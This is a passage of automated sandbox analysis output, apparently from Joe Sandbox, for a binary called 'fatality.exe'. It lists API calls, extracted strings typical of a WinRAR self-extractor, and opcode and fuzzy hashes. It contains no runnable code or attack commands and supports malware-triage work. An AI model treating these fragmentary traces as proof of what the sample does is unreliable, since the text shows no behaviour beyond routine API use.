                                                                      • Part of subcall function 00DEA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00DE977F,?,?,00DE95CF,00000000,00E12641,000000FF), ref: 00DEA1F1
                                                                      • Part of subcall function 00DE9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00DE9E70
                                                                      • Part of subcall function 00DE9620: CloseHandle.KERNELBASE(000000FF,?,?,00DE95D6,00000000,00E12641,000000FF), ref: 00DE963B
                                                                      • Part of subcall function 00DEA4ED: SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,00DEA325,00000001,00DE70E6,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA501
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: File$_wcslen$AttributesCloseDeleteH_prologHandleTime
                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                    • API String ID: 449284102-3508440684
                                                                    • Opcode ID: a5a3528f18a7849032e35fbf347cf78f7a27bfbe86e03be188e5f1896c2b65f0
                                                                    • Instruction ID: 006fef7719c91dcf337c55b82ee26f350cc6778762756edd27e64727bf8d154a
                                                                    • Opcode Fuzzy Hash: a5a3528f18a7849032e35fbf347cf78f7a27bfbe86e03be188e5f1896c2b65f0
                                                                    • Instruction Fuzzy Hash: A8C1C371904785AEDB21FB75DC41FEEB7A8EF08300F04455AFA5AE7182D770AA488B71
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00DF9736
                                                                    • _wcslen.LIBCMT ref: 00DF97D6
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DF982D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$CreateGlobalStream
                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                    • API String ID: 1938992887-4209811716
                                                                    • Opcode ID: 8d97ccfd87cdde76d5f7ef3763f1f6168a9ecc25902e3454e8e5575b4828b6c8
                                                                    • Instruction ID: d3a8f24468f12e1d770e2b02a12d91439683d4e4d786f02dab31a405cd902656
                                                                    • Opcode Fuzzy Hash: 8d97ccfd87cdde76d5f7ef3763f1f6168a9ecc25902e3454e8e5575b4828b6c8
                                                                    • Instruction Fuzzy Hash: D13139329083057ED725AF30DC06FBBB79CEF42360F15811DF601A61D2EB609A4982B6
                                                                    APIs
                                                                    • _swprintf.LIBCMT ref: 00DE2536
                                                                      • Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf_wcslen
                                                                    • String ID: ;%u$x%u$xc%u
                                                                    • API String ID: 2292043294-2277559157
                                                                    • Opcode ID: 97300daa25d2d22295767319b96d5320066f6ccac548e194890b397a9bce4004
                                                                    • Instruction ID: ae7b058cefe3ae519730a6ca3afcf6de1697cf1416ce857fe3dc53d9ac661dca
                                                                    • Opcode Fuzzy Hash: 97300daa25d2d22295767319b96d5320066f6ccac548e194890b397a9bce4004
                                                                    • Instruction Fuzzy Hash: 24F104716043C09BDB25FB2A88D5BFA77D9AB94300F0C456DED8A9B283CB648945C772
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                    • API String ID: 3519838083-3505469590
                                                                    • Opcode ID: 55252f3b4c7fc7f3c4277a4a01c0d424717a1058cff07fa96aa45f4498072a12
                                                                    • Instruction ID: 88dad9ab196483698eabb917c6d9b1ba27c2791ae6653008e0f818d412dfb94a
                                                                    • Opcode Fuzzy Hash: 55252f3b4c7fc7f3c4277a4a01c0d424717a1058cff07fa96aa45f4498072a12
                                                                    • Instruction Fuzzy Hash: 4D716D70A00259AFDB14EFAACC959AFBBB9FF49710B044159F512B72A0CB30BD45CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                    • API String ID: 176396367-3568243669
                                                                    • Opcode ID: b349088a46b1517e260081173f7b0bd982ca1f0e5038c2eb382a9bde07a673bd
                                                                    • Instruction ID: 964c75f78bf4e8ff619c8560fa5a2e3e00cf229cd50ea9c804e17a4437bd4544
                                                                    • Opcode Fuzzy Hash: b349088a46b1517e260081173f7b0bd982ca1f0e5038c2eb382a9bde07a673bd
                                                                    • Instruction Fuzzy Hash: 4151D566E4132A95DB309A259C31776F3E4DFA1750F6EC42AFBC19B2C0FB658C818271
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E02937
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00E0293F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E029C8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E029F3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E02A48
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 3990cf47e4ddea7e7ee314490b44e232410c77fc6b1d5872539660ffd756b968
                                                                    • Instruction ID: f7e1a960f837755cfcb0f6258cc74b065782aea1981d7907611550ba4bf8d7c5
                                                                    • Opcode Fuzzy Hash: 3990cf47e4ddea7e7ee314490b44e232410c77fc6b1d5872539660ffd756b968
                                                                    • Instruction Fuzzy Hash: 1041D434A00208AFCF14DF68C889ADEBBF5AF84328F149159E9157B3D2D7319A85CB90
                                                                    APIs
                                                                    • ShowWindow.USER32(?,00000000), ref: 00DF9EEE
                                                                    • GetWindowRect.USER32(?,00000000), ref: 00DF9F44
                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00DF9FDB
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00DF9FE3
                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00DF9FF9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$RectText
                                                                    • String ID: RarHtmlClassName
                                                                    • API String ID: 3937224194-1658105358
                                                                    • Opcode ID: 3530b7c5c96ab671db133af0515038e23e6cf2fb76a833e1e3a25ec7f9fc8336
                                                                    • Instruction ID: 95836e03847abb1ced75751c69a5ef756c4a3c8135dad1405ba5436215ac3191
                                                                    • Opcode Fuzzy Hash: 3530b7c5c96ab671db133af0515038e23e6cf2fb76a833e1e3a25ec7f9fc8336
                                                                    • Instruction Fuzzy Hash: C1410271405314AFCB215F75EC48F2BBBA8FF48301F098558FA4AA9156CB30E94ACB71
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                    • API String ID: 176396367-3743748572
                                                                    • Opcode ID: a0d926bc4958fdbc2c3ac799a18a8658d3a41d83ada143b0197522e33c2f7805
                                                                    • Instruction ID: 7564487e82f5bd1a5ee976a5118c0f433fd1b534e5bff1fb2a4af18ebfac960a
                                                                    • Opcode Fuzzy Hash: a0d926bc4958fdbc2c3ac799a18a8658d3a41d83ada143b0197522e33c2f7805
                                                                    • Instruction Fuzzy Hash: DA319072E4434956D630AB549C12B76F3E4EB90320F55C41FF682572C0FBA1ADD183B1
                                                                    APIs
                                                                      • Part of subcall function 00E0C868: _free.LIBCMT ref: 00E0C891
                                                                    • _free.LIBCMT ref: 00E0C8F2
                                                                      • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E08E7A,?,00000004,00000000,?,00E0C007,?,00000004,00000000,?,?,?,00E08716), ref: 00E08DE2
                                                                    • _free.LIBCMT ref: 00E0C8FD
                                                                    • _free.LIBCMT ref: 00E0C908
                                                                    • _free.LIBCMT ref: 00E0C95C
                                                                    • _free.LIBCMT ref: 00E0C967
                                                                    • _free.LIBCMT ref: 00E0C972
                                                                    • _free.LIBCMT ref: 00E0C97D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2929853658-0
                                                                    • Opcode ID: 90a536f42c5fb1171bced7071daeac01f4ec5bd236f9beb4dbb4f36b20ef5980
                                                                    • Instruction ID: 8e10f35ed3343a3394b9c16a458f6938fdc32005fe27ed166d80cbc177edf3cf
                                                                    • Opcode Fuzzy Hash: 90a536f42c5fb1171bced7071daeac01f4ec5bd236f9beb4dbb4f36b20ef5980
                                                                    • Instruction Fuzzy Hash: B0114F71590B06AAE520B7B1DC07FCB7BEC9F00B00F509E15F2DD760D2DA65B5858760
                                                                    APIs
                                                                      • Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0
                                                                      • Part of subcall function 00DEB92D: _wcsrchr.LIBVCRUNTIME ref: 00DEB944
                                                                    • _wcslen.LIBCMT ref: 00DEC197
                                                                    • _wcslen.LIBCMT ref: 00DEC1DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_wcsrchr
                                                                    • String ID: .exe$.rar$.sfx
                                                                    • API String ID: 3513545583-31770016
                                                                    • Opcode ID: 7d8a0dc6f26e58f5a29188198f705665e3d2fba03db8194481d18abec6a045dd
                                                                    • Instruction ID: 6969a285bfbd6e95321885b5a49da3eac966515b6be1369c0f2014822573a4c5
                                                                    • Opcode Fuzzy Hash: 7d8a0dc6f26e58f5a29188198f705665e3d2fba03db8194481d18abec6a045dd
                                                                    • Instruction Fuzzy Hash: 9D415B225203D595C731BF359802A7BB7A8EF41754F18690EFAC16B182E7509D83C375
                                                                    APIs
                                                                      • Part of subcall function 00DEB690: _wcslen.LIBCMT ref: 00DEB696
                                                                    • _swprintf.LIBCMT ref: 00DFCED1
                                                                    • SetDlgItemTextW.USER32(?,00000066,00E2946A), ref: 00DFCEF1
                                                                    • _wcschr.LIBVCRUNTIME ref: 00DFCF22
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFCFFE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: DialogItemText_swprintf_wcschr_wcslen
                                                                    • String ID: %s%s%u
                                                                    • API String ID: 1599705190-1360425832
                                                                    • Opcode ID: 958208e5eba2fec0fb0b86beff1b48a57ee9c8b1fd3f3a83b8795d25bec0699b
                                                                    • Instruction ID: a3981e7f37d99b381d11e1031e39fba3daae08580ab71986bc526b902fee96d9
                                                                    • Opcode Fuzzy Hash: 958208e5eba2fec0fb0b86beff1b48a57ee9c8b1fd3f3a83b8795d25bec0699b
                                                                    • Instruction Fuzzy Hash: F84181B190025DAADF21AB61DC45AFA77FDEF05300F45C0A6FB09E7041EA719A858F71
                                                                    APIs
                                                                    • _wcschr.LIBVCRUNTIME ref: 00DFCD84
                                                                      • Part of subcall function 00DFAF98: _wcschr.LIBVCRUNTIME ref: 00DFB033
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcschr
                                                                    • String ID: <$HIDE$MAX$MIN
                                                                    • API String ID: 2691759472-3358265660
                                                                    • Opcode ID: 390837f784861457f3720f923df42f2b6e6323e355186218830afb9acb657b1d
                                                                    • Instruction ID: 6fcd3ce8c3bc9c61f747266d53ed69ea6e001441972a039d98b2e17a3ad8021e
                                                                    • Opcode Fuzzy Hash: 390837f784861457f3720f923df42f2b6e6323e355186218830afb9acb657b1d
                                                                    • Instruction Fuzzy Hash: 4A316B7290020DAADB25DB64CC41AFEB3BDEF14350F45C166FA05E7180EBB09A848FB1
                                                                    APIs
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFB2BE
                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00DFB2D6
                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00DFB304
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ItemText$DialogWindow
                                                                    • String ID: GETPASSWORD1$xz
                                                                    • API String ID: 445417207-3234807970
                                                                    • Opcode ID: d60bb1ff03acfda105061cd12247bfee8a877c98edcc3bd34604d86de1b31c86
                                                                    • Instruction ID: ecd3385cfc78f0773eb5168d62d89c0231cb6f27448aded9553955cc06ae27fd
                                                                    • Opcode Fuzzy Hash: d60bb1ff03acfda105061cd12247bfee8a877c98edcc3bd34604d86de1b31c86
                                                                    • Instruction Fuzzy Hash: 7C11E532A40118BADB219AB5DC49FFE376CEB5A760F158022FB85B2080C7A0D9459771
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcschr$_swprintf
                                                                    • String ID: %c:\
                                                                    • API String ID: 437864020-3142399695
                                                                    • Opcode ID: 35c392ca7cbeddb5cb78bfd73e57b347b065669a2e2465acee47472c50901e83
                                                                    • Instruction ID: 26bdad5f6e687fa88df9cb87996f7f3c613ea70e07d80d32f716bf5ca4a53e06
                                                                    • Opcode Fuzzy Hash: 35c392ca7cbeddb5cb78bfd73e57b347b065669a2e2465acee47472c50901e83
                                                                    • Instruction Fuzzy Hash: BB01456310035169DA317B768C46D7BA7ECEE81370B54541FF584E2082EB20E88082B1
                                                                    APIs
                                                                    • LoadBitmapW.USER32(00000065), ref: 00DFB6ED
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00DFB712
                                                                    • DeleteObject.GDI32(00000000), ref: 00DFB744
                                                                    • DeleteObject.GDI32(00000000), ref: 00DFB767
                                                                      • Part of subcall function 00DFA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00DFA762
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Object$Delete$BitmapCreateGlobalLoadStream
                                                                    • String ID: ]
                                                                    • API String ID: 3658976889-3352871620
                                                                    APIs
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFD64B
                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00DFD661
                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00DFD675
                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00DFD684
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ItemText$DialogWindow
                                                                    • String ID: RENAMEDLG
                                                                    • API String ID: 445417207-3299779563
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AdjustPointer$_abort
                                                                    • String ID:
                                                                    • API String ID: 2252061734-0
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E0C817
                                                                      • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E08E7A,?,00000004,00000000,?,00E0C007,?,00000004,00000000,?,?,?,00E08716), ref: 00E08DE2
                                                                    • _free.LIBCMT ref: 00E0C829
                                                                    • _free.LIBCMT ref: 00E0C83B
                                                                    • _free.LIBCMT ref: 00E0C84D
                                                                    • _free.LIBCMT ref: 00E0C85F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2929853658-0
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E0891E
                                                                      • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E08E7A,?,00000004,00000000,?,00E0C007,?,00000004,00000000,?,?,?,00E08716), ref: 00E08DE2
                                                                    • _free.LIBCMT ref: 00E08930
                                                                    • _free.LIBCMT ref: 00E08943
                                                                    • _free.LIBCMT ref: 00E08954
                                                                    • _free.LIBCMT ref: 00E08965
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2929853658-0
                                                                    APIs
                                                                      • Part of subcall function 00DFA699: GetDC.USER32(00000000), ref: 00DFA69D
                                                                      • Part of subcall function 00DFA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DFA6A8
                                                                      • Part of subcall function 00DFA699: ReleaseDC.USER32(00000000,00000000), ref: 00DFA6B3
                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00DFA83C
                                                                      • Part of subcall function 00DFAAC9: GetDC.USER32(00000000), ref: 00DFAAD2
                                                                      • Part of subcall function 00DFAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00DFAB01
                                                                      • Part of subcall function 00DFAAC9: ReleaseDC.USER32(00000000,?), ref: 00DFAB99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ObjectRelease$CapsDevice
                                                                    • String ID: ($lU
                                                                    • API String ID: 1061551593-690053282
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: UNC$\\?\
                                                                    • API String ID: 176396367-253988292
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID: (!$C:\Users\user\Desktop\fatality.exe
                                                                    • API String ID: 269201875-2171620144
                                                                    APIs
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFAD98
                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00DFADAD
                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00DFADC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ItemText$DialogWindow
                                                                    • String ID: ASKNEXTVOL
                                                                    • API String ID: 445417207-3402441367
                                                                    • Opcode ID: 230a14cdf885e906a5d9c36a751c0746fca97523978ffec9d08658cc08d8fd92
                                                                    • Instruction ID: 47bdea1366414127cf9b9a65f973ef4a8c0e22958a6cf5e736712859c8bb2d91
                                                                    • Opcode Fuzzy Hash: 230a14cdf885e906a5d9c36a751c0746fca97523978ffec9d08658cc08d8fd92
                                                                    • Instruction Fuzzy Hash: E7110372280204AFD7119FADEC44FBA7769EF4B742F164000F348EB4A0D761A94A8732
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: __fprintf_l_strncpy
                                                                    • String ID: $%s$@%s
                                                                    • API String ID: 1857242416-834177443
                                                                    • Opcode ID: 8b9afce4902418621ba4ecc094dc26fe9d7124809048209bedf88a6e1c5736b4
                                                                    • Instruction ID: 78172a707648641db6a8f76763a95039079a2328c8078f5b3984a077c6f0046e
                                                                    • Opcode Fuzzy Hash: 8b9afce4902418621ba4ecc094dc26fe9d7124809048209bedf88a6e1c5736b4
                                                                    • Instruction Fuzzy Hash: 54018872440288AADF21FEB5CD42FEE7BA9EF01704F440011FA11A61B3E622D6559F31
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                    • API String ID: 0-56093855
                                                                    • Opcode ID: d273c6aa092e71cb5f963ea8ba5ed8300fd072e98cb7f5703d6b812f8cf115b3
                                                                    • Instruction ID: 0e14b9fdc36e6b32fc8f34cddd9af2046d2453c3ff308f2447c2bdd4f2a8a953
                                                                    • Opcode Fuzzy Hash: d273c6aa092e71cb5f963ea8ba5ed8300fd072e98cb7f5703d6b812f8cf115b3
                                                                    • Instruction Fuzzy Hash: DC01B57660434DAFD7206F66FD44ABA7FA7F759344B058026FA05E3270C6309859DBB0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _com_issue_error
                                                                    • String ID:
                                                                    • API String ID: 2162355165-0
                                                                    • Opcode ID: 914f5106c5f15b7b6e586eafe7fc8dc849b4f31487d49196bb8b90f131aa955d
                                                                    • Instruction ID: 6964f44153286013db817aa44cbe269f0ce2d21037d75ab06ea00be4082899e7
                                                                    • Opcode Fuzzy Hash: 914f5106c5f15b7b6e586eafe7fc8dc849b4f31487d49196bb8b90f131aa955d
                                                                    • Instruction Fuzzy Hash: 1941C371A0021DAFDB109F69DC45BBEBBA8EF48710F15C23AFA05E7291D7349A4087B4
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID:
                                                                    • API String ID: 176396367-0
                                                                    • Opcode ID: 1bc610621f31a29db001ed9f9f4c8cb485de4203f0e5f8d4ac7f3c227572f8b3
                                                                    • Instruction ID: 69b06f2b4088f5d3488a4753ef5ff68ef9fc6304c5b2dfbf916930595a2c5f3a
                                                                    • Opcode Fuzzy Hash: 1bc610621f31a29db001ed9f9f4c8cb485de4203f0e5f8d4ac7f3c227572f8b3
                                                                    • Instruction Fuzzy Hash: 3841B675A006695FCB21AF79CC069EE7BBCEF01310F044119FA45F7242DB30AE598AB5
                                                                    APIs
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E02B16
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E02B2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Value___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 1426506684-0
                                                                    • Opcode ID: 592491b79c642b8da15caf849efa9935b2894d7528600c2be25eb8855821c59e
                                                                    • Instruction ID: a2772586cd826d5278070c60aeb581a5a90e576b5b0d0d0f507bfc2ebf0fe5e7
                                                                    • Opcode Fuzzy Hash: 592491b79c642b8da15caf849efa9935b2894d7528600c2be25eb8855821c59e
                                                                    • Instruction Fuzzy Hash: 3D01D8321183126DF6252EB57C8DA9A3BDDEB117B8760673EF610751E0EF114C849544
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFDC61
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFDC72
                                                                    • TranslateMessage.USER32(?), ref: 00DFDC7C
                                                                    • DispatchMessageW.USER32(?), ref: 00DFDC86
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Message$DispatchPeekTranslate
                                                                    • String ID:
                                                                    • API String ID: 4217535847-0
                                                                    • Opcode ID: c8bbc2effcca0226e26f40a5828eda5ac10757c0a5e5b818a11123c30d2c8021
                                                                    • Instruction ID: 30728ca825c9c636aa4d585038c9e1e3aa65bb495c8ba14a5fb5e7d969c6a363
                                                                    • Opcode Fuzzy Hash: c8bbc2effcca0226e26f40a5828eda5ac10757c0a5e5b818a11123c30d2c8021
                                                                    • Instruction Fuzzy Hash: 6BF03C72A01219BBCB206BA6DC4CDDF7F7EEF46791B148121B60AE2051D674864AC7B0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID:
                                                                    • API String ID: 176396367-0
                                                                    • Opcode ID: edc7b52944b821ae02021a162fdf6c067fc54fa595eb7ff0b9a8b373126b97bf
                                                                    • Instruction ID: 0f4ca17c0abbaea3d1210f8481a4234b2894c59b6f658ba31bf4d38b585c606c
                                                                    • Opcode Fuzzy Hash: edc7b52944b821ae02021a162fdf6c067fc54fa595eb7ff0b9a8b373126b97bf
                                                                    • Instruction Fuzzy Hash: F8F06D33008118BFCF225F61EC09DDA3F6AEB44760B11C005F61A6A0A2CB72D6A2D690
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00DFA666
